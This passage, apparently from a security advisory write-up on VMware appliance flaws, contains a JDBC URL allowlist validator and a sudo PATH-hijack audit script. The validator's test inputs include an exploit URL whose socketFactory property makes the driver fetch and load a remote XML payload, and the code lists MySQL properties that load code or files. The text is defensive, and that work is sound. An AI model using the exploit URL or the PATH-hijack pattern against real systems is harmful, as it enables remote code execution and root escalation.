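    "mysql": {"autoDeserialize", "queryInterceptors", "statementInterceptors",
              "allowLoadLocalInfile", "allowUrlInLocalInfile"},
}

_DB_NAME = re.compile(r"[A-Za-z0-9_]+")
_PROP_VALUE = re.compile(r"[A-Za-z0-9._-]*")


def validate_jdbc_url(url, allowed_hosts=ALLOWED_DB_HOSTS):
    """Return (True, None) if url may be handed to the driver, else (False, reason)."""
    if not url.startswith("jdbc:"):
        return False, "not a jdbc: URL"
    rest = url[len("jdbc:"):]
    if re.search(r"[\s'\"\\]", rest):
        return False, "whitespace or quoting character in URL"
    parts = urlsplit(rest)
    if parts.scheme not in ALLOWED_SUBPROTOCOLS:
        return False, f"subprotocol {parts.scheme!r} not allowed"
    if parts.fragment or parts.username or parts.password:
        return False, "fragment or embedded credentials not allowed"
    if parts.hostname not in allowed_hosts:
        return False, f"host {parts.hostname!r} not in allowlist"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port is not None and not 1 <= port <= 65535:
        return False, "port out of range"
    db = parts.path.lstrip("/")
    if not _DB_NAME.fullmatch(db):
        return False, f"database name {db!r} not allowed"
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key not in SAFE_PROPERTIES:
            why = ("makes the driver load code or files named in the URL"
                   if key in CODE_LOADING_PROPERTIES[parts.scheme] else "not in allowlist")
            return False, f"property {key!r} rejected: {why}"
        if not _PROP_VALUE.fullmatch(value):
            return False, f"property {key!r} has a disallowed value"
    return True, None


# Constructed inputs. EXPLOIT_URL mirrors the PoC's URL with the host swapped for
# an allowlisted one, so the property check rather than the host check fires.
BENIGN_URL = "jdbc:postgresql://db.internal:5432/saas?sslmode=require"
EXPLOIT_URL = ("jdbc:postgresql://db.internal:1337/saas"
               "?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext"
               "&socketFactoryArg=http://192.0.2.10:9090/poc.xml")
MYSQL_URL = "jdbc:mysql://db.internal:3306/saas?autoDeserialize=true"

if __name__ == "__main__":
    for u in (BENIGN_URL, EXPLOIT_URL, MYSQL_URL):
        ok, why = validate_jdbc_url(u)
        print("ALLOW " if ok else "REJECT", u, "" if ok else f"({why})")
```

The check is deliberately an allowlist rather than a list of bad properties: the patch bypass in this advisory worked precisely because the fix removed one known-bad path (the MySQL driver) instead of constraining the URL to what the feature needs. Note that Python's `urlsplit` is stricter than the drivers' own URL parsers, which is the safe direction for a validator.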
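The privilege escalation (CVE-2022-31664) is a generic pattern rather than a one-off: a script root runs through a NOPASSWD sudoers entry calls a program by bare name, that program is not installed, and sudo is not pinning `secure_path`, so the name resolves through whatever PATH the low-privileged caller set. The following is an added example, not part of the advisory or of VMware's appliance, of an audit pass that finds this pattern: it pulls the NOPASSWD commands out of a sudoers file, extracts the bare-name commands each script invokes, and reports the ones that resolve nowhere on a pinned `secure_path`. The sudoers and script samples are constructed from the fragments quoted in the advisory, the installed-file inventory is constructed, and `SECURE_PATH` is an assumed value.

```python
"""
Audit helper for the PATH-hijack pattern behind CVE-2022-31664. Added example,
not part of the advisory or of VMware's appliance; samples are constructed
from the advisory's fragments and SECURE_PATH is an assumed operator setting.
"""
import os
import re

SECURE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Constructed sample modelled on the advisory's /etc/sudoers excerpt.
SAMPLE_SUDOERS = """\
Defaults env_reset
horizon ALL = NOPASSWD: /usr/local/horizon/scripts/horizonService.sh, \\
    /usr/local/horizon/scripts/ntpServer.hzn
"""

# Constructed sample modelled on check_ntp_server() from ntpServer.hzn.
SAMPLE_SCRIPT = """\
#!/bin/bash
function check_ntp_server() {
    # check connectivity to the given ntp server
    NTP_SERVER=$1
    for i in $(echo $NTP_SERVER | tr "," "\\n")
    do
        echo "####### Checking for NTP server : $i ########"
        sntp $i
    done
}
"""

# Words that can sit in command position without naming an external program.
SHELL_WORDS = {"if", "then", "else", "elif", "fi", "for", "while", "until", "do",
               "done", "case", "esac", "in", "function", "{", "}", "return", "exit",
               "echo", "cd", "export", "local", "set", "shift", "test", "[", "[[",
               "read", "printf"}


def _join_continuations(text):
    """Fold backslash-newline so every logical line is one string."""
    return re.sub(r"\\\r?\n", " ", text)


def nopasswd_commands(sudoers_text):
    """[(user, command), ...] for every NOPASSWD rule in the sudoers text."""
    rules = []
    for line in _join_continuations(sudoers_text).splitlines():
        m = re.match(r"^\s*(\S+)\s+\S+\s*=\s*(?:\(\S+\)\s*)?NOPASSWD:\s*(.+)$", line)
        if m:
            rules += [(m.group(1), c.strip()) for c in m.group(2).split(",") if c.strip()]
    return rules


def secure_path_set(sudoers_text):
    """True when a Defaults line pins secure_path, so sudo ignores the caller's PATH."""
    return re.search(r"^\s*Defaults\b.*\bsecure_path\s*=", sudoers_text, re.M) is not None


def bare_commands(script_text):
    """Program names invoked without a path (first word of each simple command)."""
    names = set()
    for line in _join_continuations(script_text).splitlines():
        line = line.split("#", 1)[0]  # drop comments; adequate for an audit pass
        for seg in re.split(r"\|\||&&|\||;|\$\(|`", line):
            words = seg.split()
            if not words:
                continue
            head = words[0]
            if "/" in head or "=" in head or head.startswith("$") or head.endswith("()"):
                continue  # path, assignment, expansion or function definition
            if head not in SHELL_WORDS:
                names.add(head)
    return names


def path_hijack_candidates(script_text, secure_path=SECURE_PATH, exists=os.path.isfile):
    """Bare names that resolve nowhere on secure_path: root would resolve them
    through the sudo caller's PATH, which is what the sntp call left open.
    `exists` is injectable so the check can run against an inventory."""
    missing = set()
    for name in bare_commands(script_text):
        if not any(exists(os.path.join(d, name)) for d in secure_path.split(":") if d):
            missing.add(name)
    return missing


def audit(sudoers_text, scripts, **kw):
    """{(user, script): [hijackable names]} for NOPASSWD scripts whose text is in scripts."""
    findings = {}
    for user, cmd in nopasswd_commands(sudoers_text):
        bad = path_hijack_candidates(scripts[cmd], **kw) if cmd in scripts else set()
        if bad:
            findings[(user, cmd)] = sorted(bad)
    return findings


if __name__ == "__main__":
    installed = {"/usr/bin/tr"}  # constructed inventory: tr present, sntp absent
    print("secure_path pinned:", secure_path_set(SAMPLE_SUDOERS))
    report = audit(SAMPLE_SUDOERS, {"/usr/local/horizon/scripts/ntpServer.hzn": SAMPLE_SCRIPT},
                   exists=installed.__contains__)
    for (user, cmd), names in report.items():
        print(f"{user} -> {cmd}: bare commands not on secure_path: {names}")
```

Two findings come out of the sample: `secure_path` is not pinned, and `ntpServer.hzn` calls `sntp`, which is on no secure directory. Either one fixed on its own closes the hole (a pinned `secure_path` makes the caller's `PATH=".:$PATH"` irrelevant; an absolute path or an existence check in the script removes the dangling lookup), and the audit is cheap enough to run against every NOPASSWD entry on an appliance.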